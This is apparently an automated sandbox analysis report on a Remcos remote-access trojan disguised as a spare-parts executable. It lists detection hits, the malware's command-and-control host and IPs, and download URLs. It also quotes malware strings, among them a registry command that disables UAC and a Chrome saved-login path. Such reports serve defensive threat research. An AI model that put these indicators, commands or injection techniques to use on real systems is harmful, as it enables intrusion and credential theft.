Windows Analysis Report
DWG spare parts 455RTMGF Model.exe

Overview

General Information

Sample Name:DWG spare parts 455RTMGF Model.exe
Analysis ID:704249
MD5:e9d007ac53470351186a5b53bc180ed3
SHA1:e1411689c7eb12dc132db9496f25736fba5e9f0d
SHA256:c60e8a14abc81ae3f2ffbe04b32240a92b900107e4acc9eb88e43632aee1266c
Tags:exe, RAT, RemcosRAT

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Delayed program exit found
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Yara detected Keylogger Generic
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Uuddcmhn.exe (PID: 5392 cmdline: "C:\Users\Public\Libraries\Uuddcmhn.exe" MD5: E9D007AC53470351186A5B53BC180ED3)
    • Uuddcmhn.exe (PID: 428 cmdline: C:\Users\Public\Libraries\Uuddcmhn.exe MD5: E9D007AC53470351186A5B53BC180ED3)
  • Uuddcmhn.exe (PID: 2664 cmdline: "C:\Users\Public\Libraries\Uuddcmhn.exe" MD5: E9D007AC53470351186A5B53BC180ED3)
    • Uuddcmhn.exe (PID: 2844 cmdline: C:\Users\Public\Libraries\Uuddcmhn.exe MD5: E9D007AC53470351186A5B53BC180ED3)
  • cleanup
{"Host:Port:Password": "bestsuccess.ddns.net:2442:0", "Assigned name": "bestbaby", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-COV1FL", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\nhmcdduU.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x58:$hotkey: \x0AHotKey=5
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\nhmcdduU.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
Source | Rule | Description | Author | Strings
00000002.00000002.298955656.000000000276D000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingComputerDefaults | Yara detected UAC Bypass using ComputerDefaults | Joe Security
0000000C.00000002.315016361.000000000289D000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingComputerDefaults | Yara detected UAC Bypass using ComputerDefaults | Joe Security
00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingComputerDefaults | Yara detected UAC Bypass using ComputerDefaults | Joe Security
00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingComputerDefaults | Yara detected UAC Bypass using ComputerDefaults | Joe Security
00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingComputerDefaults | Yara detected UAC Bypass using ComputerDefaults | Joe Security
                Source | Rule | Description | Author | Strings
                0.2.DWG spare parts 455RTMGF Model.exe.2510000.1.unpack | JoeSecurity_UACBypassusingComputerDefaults | Yara detected UAC Bypass using ComputerDefaults | Joe Security
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows exceutables potentially bypassing UAC using eventvwr.exe | ditekSHen
                • 0x63100:$s1: \Classes\mscfile\shell\open\command
                • 0x63160:$s1: \Classes\mscfile\shell\open\command
                • 0x63148:$s2: eventvwr.exe
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
                • 0x691e0:$a1: Remcos restarted by watchdog!
                • 0x69738:$a3: %02i:%02i:%02i:%03i
                • 0x69abd:$a4: * Remcos v
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
                • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6320c:$str_b2: Executing file:
                • 0x64328:$str_b3: GetDirectListeningPort
                • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x63e30:$str_b7: \update.vbs
                • 0x63234:$str_b9: Downloaded file:
                • 0x63220:$str_b10: Downloading file:
                • 0x632c4:$str_b12: Failed to upload file:
                • 0x642f0:$str_b13: StartForward
                • 0x64310:$str_b14: StopForward
                • 0x63dd8:$str_b15: fso.DeleteFile "
                • 0x63d6c:$str_b16: On Error Resume Next
                • 0x63e08:$str_b17: fso.DeleteFolder "
                • 0x632b4:$str_b18: Uploaded file:
                • 0x63274:$str_b19: Unable to delete:
                • 0x63da0:$str_b20: while fso.FileExists("
                • 0x63749:$str_c0: [Firefox StoredLogins not found]
                No Sigma rule has matched
                Timestamp:09/16/22-17:08:58.134170
                Source IP:192.168.2.7
                Destination IP:141.8.192.151
                SID:2850263
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:09/16/22-17:08:30.690772
                Source IP:192.168.2.7
                Destination IP:141.8.192.151
                SID:2850263
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:09/16/22-17:08:49.810384
                Source IP:192.168.2.7
                Destination IP:141.8.192.151
                SID:2850263
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:09/16/22-17:10:37.016548
                Source IP:79.134.225.115
                Destination IP:192.168.2.7
                SID:2032777
                Source Port:2442
                Destination Port:49725
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:09/16/22-17:08:34.884246
                Source IP:192.168.2.7
                Destination IP:79.134.225.115
                SID:2032776
                Source Port:49725
                Destination Port:2442
                Protocol:TCP
                Classtype:A Network Trojan was detected

                AV Detection

                Source: DWG spare parts 455RTMGF Model.exe | ReversingLabs: Detection: 76%
                Source: DWG spare parts 455RTMGF Model.exe | Virustotal: Detection: 54%
                Source: Yara match | File source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Uuddcmhn.exe PID: 2844, type: MEMORYSTR
                Source: bestsuccess.ddns.net | Avira URL Cloud: Label: malware
                Source: bestsuccess.ddns.net | Virustotal: Detection: 12%
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | ReversingLabs: Detection: 76%
                Source: 0.2.DWG spare parts 455RTMGF Model.exe.2510000.1.unpack | Avira: Label: TR/Hijacker.Gen
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
                Source: 00000006.00000002.299148196.0000000000547000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "bestsuccess.ddns.net:2442:0", "Assigned name": "bestbaby", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-COV1FL", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                Exploits

                Source: Yara match | File source: 0.2.DWG spare parts 455RTMGF Model.exe.2510000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.298955656.000000000276D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.315016361.000000000289D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Uuddcmhn.exe PID: 5392, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Uuddcmhn.exe PID: 2664, type: MEMORYSTR
                Source: DWG spare parts 455RTMGF Model.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: Binary string: easinvoker.pdb source: DWG spare parts 455RTMGF Model.exe, DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbH source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_02515B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA

                Networking

                Source: Traffic | Snort IDS: 2850263 ETPRO TROJAN MalDoc Downloader User-Agent 192.168.2.7:49721 -> 141.8.192.151:80
                Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49725 -> 79.134.225.115:2442
                Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 79.134.225.115:2442 -> 192.168.2.7:49725
                Source: Traffic | Snort IDS: 2850263 ETPRO TROJAN MalDoc Downloader User-Agent 192.168.2.7:49727 -> 141.8.192.151:80
                Source: Traffic | Snort IDS: 2850263 ETPRO TROJAN MalDoc Downloader User-Agent 192.168.2.7:49731 -> 141.8.192.151:80
                Source: Malware configuration extractor | URLs: bestsuccess.ddns.net
                Source: unknown | DNS query: name: bestsuccess.ddns.net
                Source: Joe Sandbox View | ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1, Host: geoplugin.net, Cache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 79.134.225.115 79.134.225.115
                Source: global traffic | TCP traffic: 192.168.2.7:49725 -> 79.134.225.115:2442
                Source: Uuddcmhn.exe, 0000000C.00000002.315054022.00000000029DE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyu
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                Source: unknown | DNS traffic detected: queries for: f0719949.xsph.ru
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_02525974 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle
                Source: global traffic | HTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1, User-Agent: lVali, Host: f0719949.xsph.ru
                Source: global traffic | HTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1, User-Agent: 53, Host: f0719949.xsph.ru
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1, Host: geoplugin.net, Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1, User-Agent: lVali, Host: f0719949.xsph.ru
                Source: global traffic | HTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1, User-Agent: 62, Host: f0719949.xsph.ru
                Source: global traffic | HTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1, User-Agent: lVali, Host: f0719949.xsph.ru
                Source: global traffic | HTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1, User-Agent: 17, Host: f0719949.xsph.ru
                Source: Yara match | File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara match | File source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Uuddcmhn.exe PID: 2844, type: MEMORYSTR

                System Summary

                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: DWG spare parts 455RTMGF Model.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\Public\Libraries\nhmcdduU.url, type: DROPPED | Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
                Source: C:\Users\Public\Libraries\nhmcdduU.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_025120F4
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 2_2_027520F4
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 12_2_028820F4
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: String function: 02884A98 appears 433 times
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: String function: 02754A98 appears 433 times
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: String function: 02884C24 appears 141 times
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: String function: 02754C24 appears 141 times
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: String function: 02514C24 appears 205 times
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: String function: 025148A0 appears 61 times
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: String function: 02514A98 appears 653 times
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_025248A4 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_02525DE4 Sleep,Sleep,CopyFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_02528285 Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_0252874D Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_02525DE4 Sleep,Sleep,CopyFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe | Code function: 0_2_025248A2 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 2_2_027648A4 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 2_2_027648A2 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 12_2_028948A4 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 12_2_02895DE4 Sleep,Sleep,CopyFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess
